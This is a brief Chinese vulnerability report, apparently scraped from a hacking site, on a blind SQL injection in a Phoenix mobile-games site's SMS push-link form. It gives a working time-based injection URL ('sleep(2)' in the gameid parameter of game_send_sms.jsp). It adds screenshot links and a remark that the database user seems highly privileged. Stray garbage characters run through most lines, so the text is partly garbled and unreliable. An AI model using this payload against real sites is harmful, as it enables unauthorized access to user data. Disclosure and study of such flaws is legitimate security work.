简要描述:
. q( j: P+ N6 I* V& T凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。6 H/ P" k' x. t, b) G i5 {+ {
( G3 I- S% j2 K2 w* ^' O4 Q! `详细说明:
7 ~! g3 u) f5 h, R( c存在SQL盲注url:
" _( ^$ g$ p$ i: r* y# }fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=11 J0 p" k2 a5 J1 K
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
; [% r {. Q8 F6 U8 y3 Dhttp://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
6 `8 ]7 ]7 A- B" g" Z4 r+ Q/ r) vhttp://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
1 P2 W9 d& y, m g0 {$ {' h8 L, @+ {; z+ K+ x8 ]) B
能看到mysql系统数据库,看来user权限应该很高的。。 |